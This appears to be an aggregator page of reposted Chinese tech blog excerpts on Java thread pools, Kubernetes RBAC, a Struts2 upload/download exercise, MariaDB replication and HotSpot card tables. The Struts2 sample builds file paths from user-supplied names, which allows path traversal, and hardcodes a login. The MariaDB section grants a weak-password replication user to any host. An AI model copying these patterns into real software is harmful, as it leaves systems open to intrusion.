T13_ParallelStreamAPI {public static void main(String[] args) {List<Integer> nums = new ArrayList<>();Random r = new Random();for(int i=0; i<10000; i++) nums.add(1000000 + r.nextInt(1000000));//System.out.println(nums);long start = System.currentTimeMillis();nums.forEach(v->isPrime(v));long end = System.currentTimeMillis();System.out.println(end - start);//使用parallel stream apistart = System.currentTimeMillis();nums.parallelStream().forEach(T13_ParallelStreamAPI::isPrime);//并行流,将任务切分成子任务执行end = System.currentTimeMillis();System.out.println(end - start);}static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;} } 13、总结 总结 Callable相当于一Runnable但是它有返回值 
Future:存储执行完产生的结果 FutureTask 相当于Future+Runnable,既可以执行任务,又能获取任务执行的Future结果 CompletableFuture 可以多任务异步,并对多任务控制,整合任务结果,细化完美,比如可以一个任务完成就可以整合结果,也可以所有任务完成才整合结果 4、ThreadPoolExecutor源码解析 依然只讲重点,实际还需要大家按照上篇博客中看源码的方式来看 1、常用变量的解释 // 1. ctl,可以看做一个int类型的数字,高3位表示线程池状态,低29位表示worker数量private final AtomicInteger ctl = new AtomicInteger(ctlOf(RUNNING, 0));// 2. COUNT_BITS,Integer.SIZE为32,所以COUNT_BITS为29private static final int COUNT_BITS = Integer.SIZE - 3;// 3. CAPACITY,线程池允许的最大线程数。1左移29位,然后减1,即为 2^29 - 1private static final int CAPACITY = (1 << COUNT_BITS) - 1;// runState is stored in the high-order bits// 4. 线程池有5种状态,按大小排序如下:RUNNING < SHUTDOWN < STOP < TIDYING < TERMINATEDprivate static final int RUNNING = -1 << COUNT_BITS;private static final int SHUTDOWN = 0 << COUNT_BITS;private static final int STOP = 1 << COUNT_BITS;private static final int TIDYING = 2 << COUNT_BITS;private static final int TERMINATED = 3 << COUNT_BITS;// Packing and unpacking ctl// 5. runStateOf(),获取线程池状态,通过按位与操作,低29位将全部变成0private static int runStateOf(int c) { return c & ~CAPACITY; }// 6. workerCountOf(),获取线程池worker数量,通过按位与操作,高3位将全部变成0private static int workerCountOf(int c) { return c & CAPACITY; }// 7. ctlOf(),根据线程池状态和线程池worker数量,生成ctl值private static int ctlOf(int rs, int wc) { return rs | wc; }/ Bit field accessors that don't require unpacking ctl. These depend on the bit layout and on workerCount being never negative./// 8. runStateLessThan(),线程池状态小于xxprivate static boolean runStateLessThan(int c, int s) {return c < s;}// 9. runStateAtLeast(),线程池状态大于等于xxprivate static boolean runStateAtLeast(int c, int s) {return c >= s;} 2、构造方法 public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) {// 基本类型参数校验if (corePoolSize < 0 ||maximumPoolSize <= 0 ||maximumPoolSize < corePoolSize ||keepAliveTime < 0)throw new IllegalArgumentException();// 空指针校验if (workQueue == null || threadFactory == null || handler == null)throw new NullPointerException();this.corePoolSize = corePoolSize;this.maximumPoolSize = maximumPoolSize;this.workQueue = workQueue;// 根据传入参数unit和keepAliveTime,将存活时间转换为纳秒存到变量keepAliveTime 中this.keepAliveTime = unit.toNanos(keepAliveTime);this.threadFactory = threadFactory;this.handler = handler;} 3、提交执行task的过程 public void execute(Runnable command) {if (command == null)throw new NullPointerException();/ Proceed in 3 steps: 1. If fewer than corePoolSize threads are running, try to start a new thread with the given command as its first task. The call to addWorker atomically checks runState and workerCount, and so prevents false alarms that would add threads when it shouldn't, by returning false. 2. If a task can be successfully queued, then we still need to double-check whether we should have added a thread (because existing ones died since last checking) or that the pool shut down since entry into this method. So we recheck state and if necessary roll back the enqueuing if stopped, or start a new thread if there are none. 3. If we cannot queue task, then we try to add a new thread. If it fails, we know we are shut down or saturated and so reject the task./int c = ctl.get();// worker数量比核心线程数小,直接创建worker执行任务if (workerCountOf(c) < corePoolSize) {if (addWorker(command, true))return;c = ctl.get();}// worker数量超过核心线程数,任务直接进入队列if (isRunning(c) && workQueue.offer(command)) {int recheck = ctl.get();// 线程池状态不是RUNNING状态,说明执行过shutdown命令,需要对新加入的任务执行reject()操作。// 这儿为什么需要recheck,是因为任务入队列前后,线程池的状态可能会发生变化。if (! 
isRunning(recheck) && remove(command))reject(command);// 这儿为什么需要判断0值,主要是在线程池构造方法中,核心线程数允许为0else if (workerCountOf(recheck) == 0)addWorker(null, false);}// 如果线程池不是运行状态,或者任务进入队列失败,则尝试创建worker执行任务。// 这儿有3点需要注意:// 1. 线程池不是运行状态时,addWorker内部会判断线程池状态// 2. addWorker第2个参数表示是否创建核心线程// 3. addWorker返回false,则说明任务执行失败,需要执行reject操作else if (!addWorker(command, false))reject(command);} 4、addworker源码解析 private boolean addWorker(Runnable firstTask, boolean core) {retry:// 外层自旋for (;;) {int c = ctl.get();int rs = runStateOf(c);// 这个条件写得比较难懂,我对其进行了调整,和下面的条件等价// (rs > SHUTDOWN) || // (rs == SHUTDOWN && firstTask != null) || // (rs == SHUTDOWN && workQueue.isEmpty())// 1. 线程池状态大于SHUTDOWN时,直接返回false// 2. 线程池状态等于SHUTDOWN,且firstTask不为null,直接返回false// 3. 线程池状态等于SHUTDOWN,且队列为空,直接返回false// Check if queue empty only if necessary.if (rs >= SHUTDOWN &&! (rs == SHUTDOWN &&firstTask == null &&! workQueue.isEmpty()))return false;// 内层自旋for (;;) {int wc = workerCountOf(c);// worker数量超过容量,直接返回falseif (wc >= CAPACITY ||wc >= (core ? corePoolSize : maximumPoolSize))return false;// 使用CAS的方式增加worker数量。// 若增加成功,则直接跳出外层循环进入到第二部分if (compareAndIncrementWorkerCount(c))break retry;c = ctl.get(); // Re-read ctl// 线程池状态发生变化,对外层循环进行自旋if (runStateOf(c) != rs)continue retry;// 其他情况,直接内层循环进行自旋即可// else CAS failed due to workerCount change; retry inner loop} }boolean workerStarted = false;boolean workerAdded = false;Worker w = null;try {w = new Worker(firstTask);final Thread t = w.thread;if (t != null) {final ReentrantLock mainLock = this.mainLock;// worker的添加必须是串行的,因此需要加锁mainLock.lock();try {// Recheck while holding lock.// Back out on ThreadFactory failure or if// shut down before lock acquired.// 这儿需要重新检查线程池状态int rs = runStateOf(ctl.get());if (rs < SHUTDOWN ||(rs == SHUTDOWN && firstTask == null)) {// worker已经调用过了start()方法,则不再创建workerif (t.isAlive()) // precheck that t is startablethrow new IllegalThreadStateException();// worker创建并添加到workers成功workers.add(w);// 更新largestPoolSize变量int s = workers.size();if (s > largestPoolSize)largestPoolSize = s;workerAdded = true;} } finally {mainLock.unlock();}// 启动worker线程if (workerAdded) {t.start();workerStarted = true;} }} finally {// worker线程启动失败,说明线程池状态发生了变化(关闭操作被执行),需要进行shutdown相关操作if (! workerStarted)addWorkerFailed(w);}return workerStarted;} 5、线程池worker任务单元 private final class Workerextends AbstractQueuedSynchronizerimplements Runnable{/ This class will never be serialized, but we provide a serialVersionUID to suppress a javac warning./private static final long serialVersionUID = 6138294804551838833L;/ Thread this worker is running in. Null if factory fails. /final Thread thread;/ Initial task to run. Possibly null. /Runnable firstTask;/ Per-thread task counter /volatile long completedTasks;/ Creates with given first task and thread from ThreadFactory. @param firstTask the first task (null if none)/Worker(Runnable firstTask) {setState(-1); // inhibit interrupts until runWorkerthis.firstTask = firstTask;// 这儿是Worker的关键所在,使用了线程工厂创建了一个线程。传入的参数为当前workerthis.thread = getThreadFactory().newThread(this);}/ Delegates main run loop to outer runWorker /public void run() {runWorker(this);}// 省略代码...} 6、核心线程执行逻辑-runworker final void runWorker(Worker w) {Thread wt = Thread.currentThread();Runnable task = w.firstTask;w.firstTask = null;// 调用unlock()是为了让外部可以中断w.unlock(); // allow interrupts// 这个变量用于判断是否进入过自旋(while循环)boolean completedAbruptly = true;try {// 这儿是自旋// 1. 如果firstTask不为null,则执行firstTask;// 2. 如果firstTask为null,则调用getTask()从队列获取任务。// 3. 
the nature of a blocking queue: when the queue is empty, the current thread blocks and waits
while (task != null || (task = getTask()) != null) {
    // The worker is locked here for the following purposes:
    // 1. reduce the scope of the lock, improving performance
    // 2. guarantee that the tasks executed by each worker run serially
    w.lock();
    // If pool is stopping, ensure thread is interrupted;
    // if not, ensure thread is not interrupted. This
    // requires a recheck in second case to deal with
    // shutdownNow race while clearing interrupt
    // If the thread pool is stopping, interrupt the current thread
    if ((runStateAtLeast(ctl.get(), STOP) ||
         (Thread.interrupted() &&
          runStateAtLeast(ctl.get(), STOP))) &&
        !wt.isInterrupted())
        wt.interrupt();
    // Run the task, extending it around execution via beforeExecute() and afterExecute().
    // Both methods are empty implementations in this class.
    try {
        beforeExecute(wt, task);
        Throwable thrown = null;
        try {
            task.run();
        } catch (RuntimeException x) {
            thrown = x; throw x;
        } catch (Error x) {
            thrown = x; throw x;
        } catch (Throwable x) {
            thrown = x; throw new Error(x);
        } finally {
            afterExecute(task, thrown);
        }
    } finally {
        // help gc
        task = null;
        // completed task count plus one
        w.completedTasks++;
        w.unlock();
    }
}
completedAbruptly = false;
} finally {
    // The spin loop has been exited, meaning the thread pool is shutting down
    processWorkerExit(w, completedAbruptly);
}
}

This article is reposted content. Original link: https://blog.csdn.net/grd_java/article/details/113116244.
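To experiment with the ctl bit packing explained in the walkthrough above, the layout can be reproduced outside the JDK. Here is a minimal, self-contained Java sketch; the constants mirror the ThreadPoolExecutor fields quoted earlier, while the class DemoCtl and its main method are illustrative additions, not JDK code:

import java.util.concurrent.atomic.AtomicInteger;

public class DemoCtl {
    private static final int COUNT_BITS = Integer.SIZE - 3;            // 29
    private static final int CAPACITY = (1 << COUNT_BITS) - 1;         // 2^29 - 1, mask for the worker count
    private static final int RUNNING = -1 << COUNT_BITS;               // high 3 bits hold the run state

    private static int runStateOf(int c) { return c & ~CAPACITY; }     // keep the high 3 bits
    private static int workerCountOf(int c) { return c & CAPACITY; }   // keep the low 29 bits
    private static int ctlOf(int rs, int wc) { return rs | wc; }       // pack state and count into one int

    public static void main(String[] args) {
        AtomicInteger ctl = new AtomicInteger(ctlOf(RUNNING, 0));
        ctl.incrementAndGet();                                         // simulate adding one worker
        int c = ctl.get();
        System.out.println(runStateOf(c) == RUNNING);                  // true: the state bits are untouched
        System.out.println(workerCountOf(c));                          // 1
    }
}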
2023-07-21 16:19:45
328
Repost
Kubernetes
... "list", "update", "patch", "delete"] 然后,我们可以将这个角色绑定到某个用户或者组上: yaml apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: my-app-admin-binding subjects: - kind: User name: user1 roleRef: kind: Role name: my-app-admin apiGroup: rbac.authorization.k8s.io 2. 使用PodSecurityPolicy 除了RBAC,Kubernetes还提供了另一种称为PodSecurityPolicy(PSP)的安全策略模型,我们也可以通过它来实现更细粒度的权限控制。 例如,我们可以创建一个PSP,该PSP只允许用户创建只读存储卷的Pod: yaml apiVersion: policy/v1beta1 kind: PodSecurityPolicy metadata: name: allow-read-only-volumes spec: fsGroup: rule: RunAsAny runAsUser: rule: RunAsAny seLinux: rule: RunAsAny supplementalGroups: rule: RunAsAny volumes: - configMap - emptyDir - projected - secret - downwardAPI - hostPath allowedHostPaths: - pathPrefix: /var/run/secrets/kubernetes.io/serviceaccount type: "" 五、结论 总的来说,通过使用Kubernetes提供的RBAC和PSP等工具,我们可以有效地实现对容器的细粒度的权限控制,从而保障我们的应用的安全性和合规性。当然啦,咱们也要明白一个道理,权限控制这玩意儿虽然厉害,但它可不是什么灵丹妙药,能解决所有安全问题。咱们还得配上其他招数,比如监控啊、审计这些手段,全方位地给咱的安全防护上个“双保险”,这样才能更安心嘛。
2023-01-04 17:41:32
99
雪落无痕-t
Reposted Article
...atic void copy(File source,File target){ InputStream inputStream=null;OutputStream outputStream=null;try{inputStream=new BufferedInputStream(new FileInputStream(source));outputStream=new BufferedOutputStream(new FileOutputStream(target));byte[] buffer=new byte[1024];int length=0;while((length=inputStream.read(buffer))>0){outputStream.write(buffer, 0, length);} }catch(Exception e){e.printStackTrace();}finally{if(null!=inputStream){try {inputStream.close();} catch (IOException e2) {e2.printStackTrace();} }if(null!=outputStream){try{outputStream.close();}catch(Exception e2){e2.printStackTrace();} }} }@Overridepublic String execute() throws Exception { for(int i=0;i<upload.length;i++){ String path=ServletActionContext.getServletContext().getRealPath(this.getSavePath())+"\\"+this.uploadFileName[i];File target=new File(path);copy(this.upload[i],target);}return SUCCESS;} } /20171105_shiyan_upanddown/src/nuc/sw/action/LoginAction.java package nuc.sw.action;import java.util.regex.Pattern;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionSupport;public class LoginAction extends ActionSupport {//属性驱动校验private String username;private String password;public String getUsername() {return username;}public void setUsername(String username) {this.username = username;}public String getPassword() {return password;}public void setPassword(String password) {this.password = password;}//手动检验@Overridepublic void validate() {// TODO Auto-generated method stub//进行数据校验,长度6~15位 if(username.trim().length()<6||username.trim().length()>15||username==null) {this.addFieldError("username", "用户名长度不合法!");}if(password.trim().length()<6||password.trim().length()>15||password==null) {this.addFieldError("password", "密码长度不合法!");} }//登陆业务逻辑public String loginMethod() {if(username.equals("chenghaoran")&&password.equals("12345678")) {ActionContext.getContext().getSession().put("user", username);return "loginOK";}else {this.addFieldError("err","用户名或密码不正确!");return "loginFail";} }//手动校验validateXxxpublic void validateLoginMethod() {//使用正则校验if(username==null||username.trim().equals("")) {this.addFieldError("username","用户名不能为空!");}else {if(!Pattern.matches("[a-zA-Z]{6,15}", username.trim())) {this.addFieldError("username", "用户名格式错误!");} }if(password==null||password.trim().equals("")) {this.addFieldError("password","密码不能为空!");}else {if(!Pattern.matches("\\d{6,15}", password.trim())) {this.addFieldError("password", "密码格式错误!");} }} } /20171105_shiyan_upanddown/src/nuc/sw/interceptor/LoginInterceptor.java package nuc.sw.interceptor;import com.opensymphony.xwork2.Action;import com.opensymphony.xwork2.ActionContext;import com.opensymphony.xwork2.ActionInvocation;import com.opensymphony.xwork2.ActionSupport;import com.opensymphony.xwork2.interceptor.AbstractInterceptor;public class LoginInterceptor extends AbstractInterceptor {@Overridepublic String intercept(ActionInvocation arg0) throws Exception {// TODO Auto-generated method stub//判断是否登陆,通过ActionContext访问SessionActionContext ac=arg0.getInvocationContext();String username=(String)ac.getSession().get("user");if(username!=null&&username.equals("chenghaoran")) {return arg0.invoke();//放行}else {((ActionSupport)arg0.getAction()).addActionError("请先登录!");return Action.LOGIN;} }} /20171105_shiyan_upanddown/src/struts.xml <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.1.7//EN""http://struts.apache.org/dtds/struts-2.1.7.dtd"><struts><constant name="struts.i18n.encoding" value="utf-8"/><package 
name="default" extends="struts-default"><interceptors><interceptor name="login" class="nuc.sw.interceptor.LoginInterceptor"></interceptor></interceptors> <action name="docUpload" class="nuc.sw.action.DocUploadAction"><!-- 使用fileUpload拦截器 --><interceptor-ref name="fileUpload"><!-- 指定允许上传的文件大小最大为50000字节 --><param name="maximumSize">50000</param></interceptor-ref><!-- 配置默认系统拦截器栈 --><interceptor-ref name="defaultStack"/><!-- param子元素配置了DocUploadAction类中savePath属性值为/upload --><param name="savePath">/upload</param><result>/showFile.jsp</result><!-- 指定input逻辑视图,即不符合上传要求,被fileUpload拦截器拦截后,返回的视图页面 --><result name="input">/uploadFile.jsp</result></action> <action name="docDownload" class="nuc.sw.action.DocDownloadAction"><!-- 指定结果类型为stream --><result type="stream"><!-- 指定下载文件的文件类型 text/plain表示纯文本 --><param name="contentType">application/msword,text/plain</param><!-- 指定下载文件的入口输入流 --><param name="inputName">inputStream</param><!-- 指定下载文件的处理方式与文件保存名 attachment表示以附件形式下载,也可以用inline表示内联即在浏览器中直接显示,默认值为inline --><param name="contentDisposition">attachment;filename="${downloadFileName}"</param><!-- 指定下载文件的缓冲区大小,默认为1024 --><param name="bufferSize">40960</param></result></action><action name="loginAction" class="nuc.sw.action.LoginAction" method="loginMethod"><result name="loginOK">/uploadFile.jsp</result><result name="loginFail">/login.jsp</result><result name="input">/login.jsp</result></action> </package></struts> /20171105_shiyan_upanddown/WebContent/login.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>登录页</title><s:head/></head><body><s:actionerror/><s:fielderror fieldName="err"></s:fielderror><s:form action="loginAction" method="post"> <s:textfield label="用户名" name="username"></s:textfield><s:password label="密码" name="password"></s:password><s:submit value="登陆"></s:submit></s:form></body></html> /20171105_shiyan_upanddown/WebContent/showFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>显示上传文档</title></head><body><center><font style="font-size:18px;color:red">上传者:<s:property value="name"/></font><table width="45%" cellpadding="0" cellspacing="0" border="1"><tr><th>文件名称</th><th>上传者</th><th>上传时间</th></tr><s:iterator value="uploadFileName" status="st" var="doc"><tr><td align="center"><a href="docDownload.action?downPath=upload/<s:property value="doc"/>"><s:property value="doc"/> </a></td><td align="center"><s:property value="name"/></td><td align="center"><s:date name="createTime" format="yyyy-MM-dd HH:mm:ss"/></td></tr></s:iterator></table></center></body></html> /20171105_shiyan_upanddown/WebContent/uploadFile.jsp <%@ page language="java" contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%><%@ taglib prefix="s" uri="/struts-tags" %><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>多文件上传</title></head><body><center><s:form action="docUpload" method="post" enctype="multipart/form-data"><s:textfield name="name" label="姓名" 
size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:file name="upload" label="选择文档" size="20"/><s:submit value="确认上传" align="center"/></s:form></center></body></html> 本篇文章为转载内容。原文链接:https://blog.csdn.net/qq_34101492/article/details/78811741。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-12 20:53:42
140
Repost
Reposted Article
...log-slave-updates=True        # whether updates applied on the slave are written to its log
sync-master-info=1               # 1 ensures master info is not lost
slave-parallel-threads=3         # how many replication threads to start; at most one per replicated database
binlog-checksum=CRC32            # checksum algorithm
master-verify-checksum=1         # enable checksum verification on the master
slave-sql-verify-checksum=1      # enable checksum verification on the slave
[galera]
[embedded]
[mariadb]
[mariadb-10.6]
[root@mster-k8s mysql]

11.2 Modify the slave configuration

[mysqld]
character-set-server=utf8
collation-server=utf8_general_ci
server_id=14
log-bin=mysql-bin                # log-bin is the binary log
relay_log=relay-bin              # relay log; a bare name defaults to /var/lib/mysql
lower_case_table_names=1

11.3 Restart the MariaDB service on both master and slave

systemctl restart mariadb

11.4 Configuration on the master node

MariaDB [huawei]> grant replication slave, replication client on *.* to 'liu'@'%' identified by '123456';
Query OK, 0 rows affected (0.001 sec)
MariaDB [huawei]> show master status;
+------------------+----------+--------------+------------------+
| File             | Position | Binlog_Do_DB | Binlog_Ignore_DB |
+------------------+----------+--------------+------------------+
| mysql-bin.000001 |     4990 |              |                  |
+------------------+----------+--------------+------------------+
1 row in set (0.000 sec)
MariaDB [huawei]> select binlog_gtid_pos('mysql-bin.000001', 4990);
+-------------------------------------------+
| binlog_gtid_pos('mysql-bin.000001', 4990) |
+-------------------------------------------+
| 0-13-80                                   |
+-------------------------------------------+
1 row in set (0.000 sec)
MariaDB [huawei]> flush privileges;

11.5 Configuration on the slave node

MariaDB [(none)]> set global gtid_slave_pos='0-13-80';
Query OK, 0 rows affected (0.004 sec)
MariaDB [(none)]> change master to master_host='101.34.141.216', master_user='liu', master_password='123456', master_use_gtid=slave_pos;
Query OK, 0 rows affected (0.008 sec)
MariaDB [(none)]> start slave;
Query OK, 0 rows affected (0.005 sec)

11.6 Verify the slave status

MariaDB [(none)]> show slave status\G
*************************** 1. row ***************************
Slave_IO_State: Waiting for master to send event
Master_Host: 101.34.141.216
Master_User: liu
Master_Port: 3306
Connect_Retry: 60
Master_Log_File: mysql-bin.000001
Read_Master_Log_Pos: 13260
Relay_Log_File: relay-bin.000002
Relay_Log_Pos: 10246
Relay_Master_Log_File: mysql-bin.000001
Slave_IO_Running: Yes
Slave_SQL_Running: Yes
Replicate_Do_DB:
Replicate_Ignore_DB:
Replicate_Do_Table:
Replicate_Ignore_Table:
Replicate_Wild_Do_Table:
Replicate_Wild_Ignore_Table:
Last_Errno: 0
Last_Error:
Skip_Counter: 0
Exec_Master_Log_Pos: 13260
Relay_Log_Space: 10549
Until_Condition: None
Until_Log_File:
Until_Log_Pos: 0
Master_SSL_Allowed: No
Master_SSL_CA_File:

This article is reposted content. Original link: https://blog.csdn.net/l363130002/article/details/126121255.
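As a complement to step 11.6, the same health check can also be scripted from application code. A minimal JDBC sketch, assuming the MariaDB Connector/J driver is on the classpath; the URL and credentials are placeholders, not values from the article:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class SlaveStatusCheck {
    public static void main(String[] args) throws SQLException {
        String url = "jdbc:mariadb://127.0.0.1:3306/"; // placeholder: point this at the slave
        try (Connection conn = DriverManager.getConnection(url, "monitor", "secret");
             Statement st = conn.createStatement();
             ResultSet rs = st.executeQuery("SHOW SLAVE STATUS")) {
            if (rs.next()) {
                // Replication is healthy only when both threads report Yes.
                System.out.println("Slave_IO_Running:  " + rs.getString("Slave_IO_Running"));
                System.out.println("Slave_SQL_Running: " + rs.getString("Slave_SQL_Running"));
            } else {
                System.out.println("This server is not configured as a slave.");
            }
        }
    }
}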
2023-07-12 10:11:01
310
Repost
Reposted Article
...eed to be updated to reflect any change to this.// This code can typically be found by searching for the byte_map_base() method.STATIC_ASSERT(sizeof(CardValue) == 1);protected:// The declaration order of these const fields is important; see the// constructor before changing.const MemRegion _whole_heap; // the region covered by the card tableconst size_t _page_size; // page size used when mapping _byte_mapsize_t _byte_map_size; // in bytesCardValue _byte_map; // the card marking arrayCardValue _byte_map_base;// Some barrier sets create tables whose elements correspond to parts of// the heap; the CardTableBarrierSet is an example. Such barrier sets will// normally reserve space for such tables, and commit parts of the table// "covering" parts of the heap that are committed. At most one covered// region per generation is needed.static constexpr int max_covered_regions = 2;// The covered regions should be in address order.MemRegion _covered[max_covered_regions];// The last card is a guard card; never committed.MemRegion _guard_region;inline size_t compute_byte_map_size(size_t num_bytes);enum CardValues {clean_card = (CardValue)-1,dirty_card = 0,CT_MR_BS_last_reserved = 1};// a word's worth (row) of clean card valuesstatic const intptr_t clean_card_row = (intptr_t)(-1);// CardTable entry sizestatic uint _card_shift;static uint _card_size;static uint _card_size_in_words;size_t last_valid_index() const {return cards_required(_whole_heap.word_size()) - 1;}private:void initialize_covered_region(void region0_start, void region1_start);MemRegion committed_for(const MemRegion mr) const;public:CardTable(MemRegion whole_heap);virtual ~CardTable() = default;void initialize(void region0_start, void region1_start);// Barrier set functions.// Initialization utilities; covered_words is the size of the covered region// in, um, words.inline size_t cards_required(size_t covered_words) const {assert(is_aligned(covered_words, _card_size_in_words), "precondition");return covered_words / _card_size_in_words;}// Dirty the bytes corresponding to "mr" (not all of which must be// covered.)void dirty_MemRegion(MemRegion mr);// Clear (to clean_card) the bytes entirely contained within "mr" (not// all of which must be covered.)void clear_MemRegion(MemRegion mr);// Return true if "p" is at the start of a card.bool is_card_aligned(HeapWord p) {CardValue pcard = byte_for(p);return (addr_for(pcard) == p);}// Mapping from address to card marking array entryCardValue byte_for(const void p) const {assert(_whole_heap.contains(p),"Attempt to access p = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(p), p2i(_whole_heap.start()), p2i(_whole_heap.end()));CardValue result = &_byte_map_base[uintptr_t(p) >> _card_shift];assert(result >= _byte_map && result < _byte_map + _byte_map_size,"out of bounds accessor for card marking array");return result;}// The card table byte one after the card marking array// entry for argument address. 
Typically used for higher bounds// for loops iterating through the card table.CardValue byte_after(const void p) const {return byte_for(p) + 1;}void invalidate(MemRegion mr);// Provide read-only access to the card table array.const CardValue byte_for_const(const void p) const {return byte_for(p);}const CardValue byte_after_const(const void p) const {return byte_after(p);}// Mapping from card marking array entry to address of first wordHeapWord addr_for(const CardValue p) const {assert(p >= _byte_map && p < _byte_map + _byte_map_size,"out of bounds access to card marking array. p: " PTR_FORMAT" _byte_map: " PTR_FORMAT " _byte_map + _byte_map_size: " PTR_FORMAT,p2i(p), p2i(_byte_map), p2i(_byte_map + _byte_map_size));// As _byte_map_base may be "negative" (the card table has been allocated before// the heap in memory), do not use pointer_delta() to avoid the assertion failure.size_t delta = p - _byte_map_base;HeapWord result = (HeapWord) (delta << _card_shift);assert(_whole_heap.contains(result),"Returning result = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(result), p2i(_whole_heap.start()), p2i(_whole_heap.end()));return result;}// Mapping from address to card marking array index.size_t index_for(void p) {assert(_whole_heap.contains(p),"Attempt to access p = " PTR_FORMAT " out of bounds of "" card marking array's _whole_heap = [" PTR_FORMAT "," PTR_FORMAT ")",p2i(p), p2i(_whole_heap.start()), p2i(_whole_heap.end()));return byte_for(p) - _byte_map;}CardValue byte_for_index(const size_t card_index) const {return _byte_map + card_index;}// Resize one of the regions covered by the remembered set.void resize_covered_region(MemRegion new_region);// Card-table-RemSet-specific things.static uintx ct_max_alignment_constraint();static uint card_shift() {return _card_shift;}static uint card_size() {return _card_size;}static uint card_size_in_words() {return _card_size_in_words;}static constexpr CardValue clean_card_val() { return clean_card; }static constexpr CardValue dirty_card_val() { return dirty_card; }static intptr_t clean_card_row_val() { return clean_card_row; }// Initialize card sizestatic void initialize_card_size();// Card marking array base (adjusted for heap low boundary)// This would be the 0th element of _byte_map, if the heap started at 0x0.// But since the heap starts at some higher address, this points to somewhere// before the beginning of the actual _byte_map.CardValue byte_map_base() const { return _byte_map_base; }virtual bool is_in_young(const void p) const = 0;}; class G1CardTable : public CardTable {friend class VMStructs;friend class G1CardTableChangedListener;G1CardTableChangedListener _listener;public:enum G1CardValues {g1_young_gen = CT_MR_BS_last_reserved << 1,// During evacuation we use the card table to consolidate the cards we need to// scan for roots onto the card table from the various sources. 
Further it is
// used to record already completely scanned cards to avoid re-scanning them
// when incrementally evacuating the old gen regions of a collection set.
// This means that already scanned cards should be preserved.
//
// The merge at the start of each evacuation round simply sets cards to dirty
// that are clean; scanned cards are set to 0x1.
//
// This means that the LSB determines what to do with the card during evacuation
// given the following possible values:
//
// 11111111 - clean, do not scan
// 00000001 - already scanned, do not scan
// 00000000 - dirty, needs to be scanned.
//
g1_card_already_scanned = 0x1
};

static const size_t WordAllClean = SIZE_MAX;
static const size_t WordAllDirty = 0;
STATIC_ASSERT(BitsPerByte == 8);
static const size_t WordAlreadyScanned = (SIZE_MAX / 255) * g1_card_already_scanned;

G1CardTable(MemRegion whole_heap) :
  CardTable(whole_heap), _listener()
{
  _listener.set_card_table(this);
}

static CardValue g1_young_card_val() { return g1_young_gen; }
static CardValue g1_scanned_card_val() { return g1_card_already_scanned; }

void verify_g1_young_region(MemRegion mr) PRODUCT_RETURN;
void g1_mark_as_young(const MemRegion& mr);

size_t index_for_cardvalue(CardValue const* p) const {
  return pointer_delta(p, _byte_map, sizeof(CardValue));
}

// Mark the given card as Dirty if it is Clean. Returns whether the card was
// Clean before this operation. This result may be inaccurate as it does not
// perform the dirtying atomically.
inline bool mark_clean_as_dirty(CardValue* card);

// Change Clean cards in a (large) area on the card table as Dirty, preserving
// already scanned cards. Assumes that most cards in that area are Clean.
inline void mark_range_dirty(size_t start_card_index, size_t num_cards);

// Change the given range of dirty cards to "which". All of these cards must be Dirty.
inline void change_dirty_cards_to(CardValue* start_card, CardValue* end_card, CardValue which);

inline uint region_idx_for(CardValue* p);

static size_t compute_size(size_t mem_region_size_in_words) {
  size_t number_of_slots = (mem_region_size_in_words / _card_size_in_words);
  return ReservedSpace::allocation_align_size_up(number_of_slots);
}

// Returns how many bytes of the heap a single byte of the Card Table corresponds to.
static size_t heap_map_factor() { return _card_size; }

void initialize(G1RegionToSpaceMapper* mapper);

bool is_in_young(const void* p) const override;
};

A bitmap with bit granularity can describe the reference relationship of every single word precisely, but one bit carries too little information: it can only express two states, referenced or not referenced. In practice the JVM needs more states during garbage collection. If the unit were enlarged to one byte per word, the map would need 256 KB, which is too large, a 25% overhead. A possible approach is therefore to let each map entry describe not a word but a region. The JVM chose 512 bytes as the unit, that is, one byte describes the reference state of 512 bytes. Beyond space efficiency, choosing a region also has practical meaning: a Java object cannot really be described by one word anyway (a parameter controls the minimum object alignment, 8 bytes by default, and since Java objects carry extra header information in the JVM, the smallest aligned Java object is 16 bytes), and many Java objects run to tens or hundreds of bytes, so describing a region with one byte is meaningful. I have not found the origin of 512, however. Why does 512 work best? There is no data to support this number, and the value cannot be configured or modified, but it is reasonable to believe the 512-byte region was chosen to save memory overhead. At this ratio, 1 MB of memory needs only 2 KB of extra space to describe its reference relationships. This in turn raises another problem: the memory inside those 512 bytes may be referenced several times, so this is only a coarse description of the relationship, and the 512 bytes have to be traversed when the card is used.

